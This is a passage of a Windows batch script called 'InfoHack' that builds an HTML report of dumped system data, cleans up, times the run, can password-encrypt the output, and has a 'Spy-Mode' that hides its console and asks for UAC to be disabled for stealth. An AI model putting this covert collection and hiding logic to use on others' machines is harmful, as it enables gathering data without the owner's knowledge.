echo body { margin:0; padding:10px; }
echo p { margin:0 }
echo a { text-decoration:none;  background-color:Transparent; color:#05F; }
echo a:visited { color:#FF0000; }
echo a:hover { background-color:#EEF; }
echo img { border-style:none }
echo td { font-size:10pt; background:#FFF; border:1px solid #BBF }
echo td img { vertical-align:top }
echo th, th a, th a:visited { color:#555; font-size:13pt; font-weight:bold; padding-bottom:0; }
echo #foldercomment { font-size:10pt; color:#888; background:#EEE; padding:3px; border:1px solid #DDD; border-bottom:3px solid #DDD; margin-top:2px; }
echo #tools { text-align:right; font-size: 8pt; }
echo #folder, .big { font-size:14pt; font-weight:bold;  }
echo #folderlabel, #folderstats, #footer { font-size: 8pt; }
echo #body {
echo   border-bottom: 4px solid #BBF;
echo      border-top: 4px solid #BBF;
echo     border-left: 1px dotted #BBF;
echo    border-right: 1px dotted #BBF;
echo   background:#F3F3FF;
echo   padding:15px;
echo   margin:15px;
echo }
echo .comment { font-size:7pt; color:#888; background:#EEE; padding:3px; border:1px solid #DDD; margin-top:2px; }
echo .button { float:right; padding:5px; padding-top:7px; margin:15px; border:2px solid black; background:white; font-size:8pt; font-weight:bold; }
echo .button img { vertical-align:text-bottom; }
echo .flag { font-weight:bold; font-size:8pt; background:white; color:red; text-align:center; border:1px solid red; }
echo.
echo.
echo   .style1 {
echo 	color: #EEEEFF;
echo 	font-size: large;
echo }
echo .style2 {
echo 	color: #F3F3FF;
echo }
echo .style3 {
echo 	border-color: #000000;
echo }
echo.
echo.
echo   .style4 {
echo 	font-size: small;
echo }
echo.
echo.
echo   ^</style^>
echo   ^<title^>InfoHack - "%username%" on "%userdomain%"^</title^>
echo   ^<link rel="shortcut icon" href="favicon.ico" /^>
echo ^</head^>
echo ^<body style="background-color: #000000"^>
echo ^<div id=folder class="style1"^>InfoHack "%ihver%" ^</div^>
echo.
echo.
echo.
echo.
echo ^<div id=folderlabel class="style2"^>^<span class="style4"^>^<strong^>By DarkPhoeniX --- KGB Systems^</strong^>^</span^>^<div id=folderlabel0 class="style2"^>Username: "%username%" on "%userdomain%"
echo.
echo.
echo.
echo.
echo ^<div id=folderlabel1 class="style2"^>Operating System: "%winRegver%" ^("%sys%" Bit^)^<br /^>
echo 	TimeStamp:"%TimeStamp%"  ^<br /^>
echo 	^</div^>
echo 	^</div^>
echo ^</div^>
echo ^<div id=body^>
echo.
echo.
echo ^<table cellpadding=5^>
echo ^<th^>^<a href="?sort=n"^>Hack Name
for /f "tokens=1,2 delims=." %%a in ('dir /b %Directory%\html^|sort') do echo ^</a^>^<tr^>^<td class="style3"^>^<a href="html/%%a.%%b"^>%%a
echo.
echo	^</table^>
echo ^</div^>
echo ^<div id=footer^>
echo ^<a href="html/log.txt"^>InfoHack Log^</a^>
echo.
echo.
echo ^</div^>
echo ^</body^>
echo ^</html^>
) > "%Directory%\InfoHack.html"
:: --------------------------------------------------------------------------------------------------------------------------------------------
If EXIST %Directory%/InfoHack.html (%SUBecho% -log "        --- InfoHack.html Created") else %SUBecho% -log "        --- InfoHack.html BAD, Write error Occurred"
copy "%comp%\favicon.ico" %Directory%\ /v /y >nul 
If EXIST %Directory%/favicon.ico (%SUBecho% -log "        --- Favicon.ico Created") else %SUBecho% -log "        --- Favicon.ico BAD, Write error Occurred"

goto cleanup




::Cleanup And Log-End
::---------------------------------------------------------------------------------------------------------
:cleanup
echo.
%SUBecho% -EchoOnly "----------------------------------------------------------------------"
%SUBecho% -log "Cleaning Temp files"

If EXIST wmicXP.exe (del "wmicXP.exe" /f /q)>nul
del "%comp%\*.*" /f  /q >nul
rmdir /s "%comp%\" /q >nul
%SUBecho% -log "Cleaning Done"

::Error Counter
::---------------------------------------
for /F "tokens=3" %%a in ('find /C "--- OK" log.txt') do (Set OK=%%a)
for /F "tokens=3" %%a in ('find /C "Dumping" log.txt') do (set Dump=%%a)
for /F "tokens=3" %%a in ('find /C "Error" log.txt') do (set Error=%%a)
for /F "tokens=3" %%a in ('find /C "Warning" log.txt') do (set Warning=%%a)
echo.
echo.
%SUBecho% -log "%OK% Of %Dump% Hacks Sucseeded, %Error% Errors, %Warning% Warnings"

::Stopwatsh
::------------------------------------
set endtime=%time%
if %endtime:~0,1%]==] set endhrs=%endtime:~1,1%
if not %endtime:~0,1%]==] set endhrs=%endtime:~0,2%
if %endtime:~3,1%==0 set endmin=%endtime:~4,1%
if not %endtime:~3,1%==0 set endmin=%endtime:~3,2%
if %endtime:~6,1%==0 set endsec=%endtime:~6,1%
if not %endtime:~6,1%==0 set endsec=%endtime:~6,2%
if %endtime:~9,1%==0 set endmsec=%endtime:~-1%
if not %endtime:~9,1%==0 set endmsec=%endtime:~-2%
set /a endsec=%endsec% * 1000
set /a endmin=%endmin% * 60000
set /a endhrs=%endhrs% * 3600000
set /a endmsec=%endmsec% + %endhrs% + %endmin% + %endsec%
if %starttime:~0,1%]==] set starthrs=%starttime:~1,1%
if not %starttime:~0,1%]==] set starthrs=%starttime:~0,2%
if %starttime:~3,1%==0 set startmin=%starttime:~4,1%
if not %starttime:~3,1%==0 set startmin=%starttime:~3,2%
if %starttime:~6,1%==0 set startsec=%starttime:~6,1%
if not %starttime:~6,1%==0 set startsec=%starttime:~6,2%
if %starttime:~9,1%==0 set startmsec=%starttime:~-1%
if not %starttime:~9,1%==0 set startmsec=%starttime:~-2%
set /a startsec=%startsec% * 1000
set /a startmin=%startmin% * 60000
set /a starthrs=%starthrs% * 3600000
set /a startmsec=%startmsec% + %starthrs% + %startmin% + %startsec%
if %startmsec% gtr %endmsec% set /a endmsec=%endmsec% + 86400000
set /a finaltime=%endmsec% - %startmsec%
set decfinaltime=%finaltime%
set /a finalhrs=%finaltime% / 3600000
if %finalhrs% gtr 0 set /a finaltime=%finaltime% - 3600000 * %finalhrs%
set /a finalmin=%finaltime% / 60000
if %finalmin% gtr 0 set /a finaltime=%finaltime% - 60000 * %finalmin%
set /a finalsec=%finaltime% / 1000
if %finalsec% gtr 0 set /a finaltime=%finaltime% - 1000 * %finalsec%
set finalmsec=%finaltime%
set /a totalmseconds=%finalhrs% * 3600000 + %finalmin% * 60000 + %finalsec% * 1000 + %finalmsec%
set /a totalseconds=%finalhrs% * 3600 + %finalmin% * 60 + %finalsec%
set /a totalminutes=%finalhrs% * 60 + %finalmin%
set /a totalhours=%finalhrs%
set dectotalseconds=%decfinaltime:~0,-3%.%decfinaltime:~-3%
set /a dectotalminutes=%decfinaltime% / 60
set dectotalminutes=%dectotalminutes:~0,-3%.%dectotalminutes:~-3%
set /a dectotalhours=%decfinaltime% / 3600
set dectotalhours=%dectotalhours:~0,-3%.%dectotalhours:~-3%
set filtertime=%finalmsec% miliseconds
if not %finalsec%==0 set filtertime=%finalsec% seconds %finalmsec% miliseconds
if not %finalmin%==0 set filtertime=%finalmin% minutes : %finalsec% seconds %finalmsec% miliseconds
if not %finalhrs%==0 set filtertime=%finalhrs% hours : %finalmin% minutes : %finalsec% seconds %finalmsec% miliseconds
%SUBecho% -log "Hacked in %filtertime%"
if %nopause%==Disabled %SUBecho% -log "Press Any key to Exit"
%SUBecho% -logOnly "InfoHack Closed Successfully"
%SUBecho% -logOnly "----------------------------------------------------------------------"
copy "%cd%\%LogFile%" %Directory%\html\ /v /y >nul
del %LogFile% /f  /q >nul
if %filepass%==1 Echo Encrypting Output file
if %filepass%==1 7za a -t7z %Directory% %Directory% -y -mx9 -p%Passw% -mhe>nul
if %filepass%==1 rmdir /s %Directory% /q>nul
if %filepass%==1 echo Done Encrypting
color 27
if %nopause%==Disabled pause>nul
Goto END




::Errors
::---------------------------------------------------------------------------------------------------------
:BadWindowsVer
cls
color 47
%SUBecho% -log "Non NT Windows or Bad Windows Version"
%SUBecho% -log "Detected Windows: %win%"
%SUBecho% -log "The componants in this tool is made for Windows XP\Vista\7"
if %nopause%==Disabled %SUBecho% -log "Press Any key to Exit"
%SUBecho% -logOnly "InfoHack Closed With Error 1"
%SUBecho% -logOnly "----------------------------------------------------------------------"
copy "%cd%\%LogFile%" %Directory%\html\ /v /y >nul
del %LogFile% /f  /q >nul
if %nopause%==Disabled pause>nul
if %autoexit%==Enabled goto endx
endlocal
exit /b 1

:WriteMediaError
cls
color 47
echo This Tool cannot be run on read-only media!
echo The Log cannot record this error!
::echo Spy-mode cannot run!
echo Or a antivirus or UAC may be stoping execution!
if %nopause%==Disabled echo Press Any key to Exit
if %nopause%==Disabled pause>nul
if %autoexit%==Enabled goto endx
endlocal
exit /b 2

:BitCheckError
cls
color 47
%SUBecho% -log "Failed to Detect System Bit Type (x64/x32)"
%SUBecho% -log "Detected Bit Type: %sys%"
%SUBecho% -log "The componants in this tool is made for Windows x64/x32"
if %nopause%==Disabled %SUBecho% -log "Press Any key to Exit"
%SUBecho% -logOnly "InfoHack Closed With Error 3"
%SUBecho% -logOnly "----------------------------------------------------------------------"
copy "%cd%\%LogFile%" %Directory%\html\ /v /y >nul
del %LogFile% /f  /q >nul
if %nopause%==Disabled pause>nul
if %autoexit%==Enabled goto endx
endlocal
exit /b 3

:UACfail
cls
color 47
echo InfoHack Can't be all Stealthy if the UAC can see it
echo Disable the UAC and Try Agin
if %nopause%==Disabled echo Press Any key to Exit
if %nopause%==Disabled pause>nul
if %autoexit%==Enabled goto endx
endlocal
exit /b 4

:END
if %autoexit%==Enabled goto endx
endlocal
Exit /b 0

:endx
exit


::Sub functions
::---------------------------------------------------------------------------------------------------------
:SUBroot
set SUBfunc=%1
if %SUBfunc%==-log goto log
if %SUBfunc%==-logOnly goto logOnly
if %SUBfunc%==-EchoOnly goto EchoOnly
goto SUBError
goto :EOF

:log
shift
shift
set Logline=%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
set Logline=%logline:"=%
echo %Logline%
echo [%date%][%time%] %logline% >>%LogFile%
goto :EOF

:logOnly
shift
shift
set Logline=%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
set Logline=%logline:"=%
echo [%date%][%time%] %logline% >>%LogFile%
goto :EOF

:EchoOnly
shift
shift
set Logline=%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
set Logline=%logline:"=%
echo %logline%
goto :EOF

:SUBError
Echo SUB Error:
echo Falure in the script Sub
echo The script will now exit
pause>nul
goto :EOF


::Help text
::---------------------------------------------------------------------------------------------------------
:help
echo ----------------------------------------------------------------------
echo InfoHack %ihver%			By DarkPhoeniX --- KGB Systems
Echo Kenetic Genuis Box - Systems
echo ----------------------------------------------------------------------
echo.
echo InfoHack [-np] [-ts] [-nr] [-nusb] [-p:{Password}] [-h]
echo.
echo CMD Switshes:
Echo -na No Autoruns Mode(faster Hack Time)
echo -np no-pause-mode: the script will not pause
::echo -s Spy-Mode:hide CMD console and enables no-pause-mode
::echo -sx Spy-Exit-Mode: run Spy-Mode then exit cmd console
echo -ts Timestamp the generated File
echo -nr Skip regestry Save(faster Hack Time)
echo -p:{Password} Creates a .7z Password Encrypted file [Eg.infohack -p:MyPassword]
echo -h Shows Help
echo -nusb No USB Dump Enabled(faster Hack Time)
echo.
echo CMD Exit codes:
::echo (Note Exit Codes Dose Not Apply To -sx Mode)
echo 0 - No Critical Errors
echo 1 - Bad Windows version
echo 2 - Read only Media Error
Echo 3 - Bit Type Check Error
::echo 4 - Spymode fail on UAC
goto :EOF

::Spy-Mode
::---------------------------------------------------------------------------------------------------------

:spy
if %Uac%==Enabled goto UACfail
7za e Components.7z nircmd.exe -pPASSWORD -y -o"%comp%\">nul
::read only media test checks for nircmd.exe
if not exist "%comp%\nircmd.exe" goto error2
"%comp%\nircmd.exe" win hide ititle "%title%"
set spy=Enabled
set nopause=Enabled
goto IHstart

:spyx
if %Uac%==Enabled goto UACfail
7za e Components.7z nircmd.exe -pPASSWORD -y -o"%comp%\">nul
::read only media test checks for nircmd.exe
if not exist "%comp%\nircmd.exe" goto error2
"%comp%\nircmd.exe" win hide ititle "%title%"
set spy=Enabled
set nopause=Enabled
set autoexit=Enabled
goto IHstart

::End Of File
::---------------------------------------------------------------------------------------------------------